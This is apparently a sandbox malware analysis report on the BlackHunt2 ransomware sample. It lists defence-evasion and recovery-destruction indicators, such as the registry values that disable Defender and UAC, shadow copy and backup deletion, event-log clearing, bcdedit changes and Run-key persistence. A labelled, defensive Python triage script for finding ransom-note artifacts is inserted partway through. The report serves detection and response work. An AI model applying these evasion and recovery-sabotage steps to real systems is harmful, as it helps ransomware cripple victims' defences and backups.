Malware Analysis Report

2025-06-16 00:03

Sample ID 241106-a5vjpssfmn
Target BlackHunt2.exe
SHA256 ba011447038aab7f6b94cad29c2ac6405c1b8098dc65a94fb095af48422a56c9
Tags
defense_evasion discovery evasion execution impact persistence ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ba011447038aab7f6b94cad29c2ac6405c1b8098dc65a94fb095af48422a56c9

Threat Level: Known bad

The file BlackHunt2.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution impact persistence ransomware trojan

Modifies Windows Defender Real-time Protection settings

Deletes NTFS Change Journal

UAC bypass

Renames multiple (3360) files with added filename extension

Renames multiple (2894) files with added filename extension

Modifies boot configuration data using bcdedit

Clears Windows event logs

Deletes shadow copies

Disables use of System Restore points

Deletes backup catalog

Disables Task Manager via registry modification

Checks computer location settings

Deletes itself

Adds Run key to start application

Looks up external IP address via web service

Enumerates connected drives

Checks whether UAC is enabled

Sets desktop wallpaper using registry

Drops file in Program Files directory

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Program crash

Enumerates physical storage devices

Unsigned PE

Runs ping.exe

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Kills process with taskkill

Checks SCSI registry key(s)

Interacts with shadow copies

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Suspicious behavior: CmdExeWriteProcessMemorySpam

System policy modification

Modifies registry class

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-06 00:48

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-06 00:48

Reported

2024-11-06 00:50

Platform

win7-20240903-en

Max time kernel

121s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

Signatures

Deletes NTFS Change Journal

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\fsutil.exe | N/A
N/A | N/A | C:\Windows\system32\fsutil.exe | N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A

Clears Windows event logs

evasion ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A
N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A
N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A
N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A
N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Renames multiple (2894) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A
N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A

Disables Task Manager via registry modification

evasion

Disables use of System Restore points

evasion

Deletes itself

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | C:\Windows\system32\reg.exe | N/A

Checks whether UAC is enabled

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\M: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\W: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\P: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\L: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\F: | C:\Windows\system32\vssadmin.exe | N/A
File opened (read-only) | \??\Q: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\R: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\A: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\S: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\H: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\F: | C:\Windows\system32\vssadmin.exe | N/A
File opened (read-only) | \??\T: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\G: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\M: | C:\Windows\system32\fsutil.exe | N/A
File opened (read-only) | \??\I: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\O: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\K: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\B: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\V: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\X: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\F: | C:\Windows\system32\fsutil.exe | N/A
File opened (read-only) | \??\Y: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\J: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\E: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\U: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened (read-only) | \??\N: | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\ku_IQ\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Dili | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Dublin | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\WhiteDot.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\Java\jre7\lib\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\ext\jaccess.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground.wmv | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Caracas | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\content-types.properties | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\bn\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\hy\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\Java\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\7-Zip\7zCon.sfx | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2 | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A
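The artifacts listed under Drops file in Program Files directory (#BlackHunt_ReadMe.txt, #BlackHunt_ReadMe.hta and #BlackHunt_Private.key dropped next to the encrypted files) together with the .Hunt2 file class registered above are what a responder sweeps a host for. The script below is an added triage example, not part of this sandbox report or of the malware: it walks a directory tree, separates ransom notes and dropped key files from encrypted files, and summarises the affected directories and the original extensions of the encrypted files. It assumes encrypted files carry an appended .Hunt2 suffix, which is inferred from the class registration rather than confirmed by this report, and the sample tree it builds in a temporary directory is constructed for the example.

```python
"""Sweep a directory tree for BlackHunt-style artifacts (added example, not report output)."""
import os
import tempfile
from collections import Counter, defaultdict
from pathlib import Path

RANSOM_NOTES = {"#BlackHunt_ReadMe.txt", "#BlackHunt_ReadMe.hta"}  # names seen in the report
DROPPED_KEY = "#BlackHunt_Private.key"                              # name seen in the report
ENCRYPTED_SUFFIX = ".Hunt2"  # ASSUMPTION: inferred from the .Hunt2 file-class registration


def classify(name: str) -> str:
    """Map a file name to one of: note, key, encrypted, other."""
    if name in RANSOM_NOTES:
        return "note"
    if name == DROPPED_KEY:
        return "key"
    # A bare ".Hunt2" has no original name in front of it, so it is not an encrypted file.
    if name.endswith(ENCRYPTED_SUFFIX) and len(name) > len(ENCRYPTED_SUFFIX):
        return "encrypted"
    return "other"


def original_name(encrypted: str) -> str:
    """Recover the pre-encryption file name by stripping the appended suffix."""
    return encrypted[: -len(ENCRYPTED_SUFFIX)]


def triage(root) -> dict:
    """Walk `root`; return artifact counts, affected directories and original extensions."""
    root = Path(root)
    counts = Counter()
    per_dir = defaultdict(Counter)
    orig_exts = Counter()
    for dirpath, _dirs, files in os.walk(root):
        rel = Path(dirpath).relative_to(root).as_posix()
        for name in files:
            kind = classify(name)
            counts[kind] += 1
            per_dir[rel][kind] += 1
            if kind == "encrypted":
                orig_exts[Path(original_name(name)).suffix.lower() or "(none)"] += 1
    # A directory counts as affected if the encryptor left any artifact in it.
    affected = sorted(d for d, c in per_dir.items() if c["encrypted"] or c["note"] or c["key"])
    return {"counts": dict(counts), "affected_dirs": affected,
            "original_extensions": dict(orig_exts)}


def build_sample_tree() -> str:
    """Create a constructed sample tree in a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="blackhunt_triage_")
    layout = {  # constructed layout modelled on the Program Files drops in the report
        "Program Files/Java/jre7/lib": [
            "content-types.properties.Hunt2", DROPPED_KEY, "#BlackHunt_ReadMe.txt"],
        "Program Files/VideoLAN/VLC/locale/fr/LC_MESSAGES": ["vlc.mo.Hunt2", "#BlackHunt_ReadMe.hta"],
        "Users/Admin/Documents": ["budget.xlsx.Hunt2", "notes.txt.Hunt2", "#BlackHunt_ReadMe.txt"],
        "Windows/System32": ["kernel32.dll"],  # untouched directory: must not be reported
    }
    for rel, names in layout.items():
        d = Path(root, rel)
        d.mkdir(parents=True)
        for name in names:
            (d / name).write_bytes(b"\x00" * 16)
    return root


if __name__ == "__main__":
    for key, val in triage(build_sample_tree()).items():
        print(f"{key}: {val}")
```

Run directly it prints the summary for the constructed tree; pointing triage() at a mounted image or a live volume gives the same summary for real data. The per-directory grouping matters because the note and key file are dropped in every directory the encryptor touched, so the affected-directory list is the encryption scope, and the original-extension histogram shows which data types were hit without opening a single encrypted file.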

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2872 wrote to memory of 2300 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2300 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2300 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2300 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2448 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2448 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2448 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2448 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2432 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2432 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2432 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2432 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 296 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 296 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 296 | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | C:\Windows\System32\cmd.exe
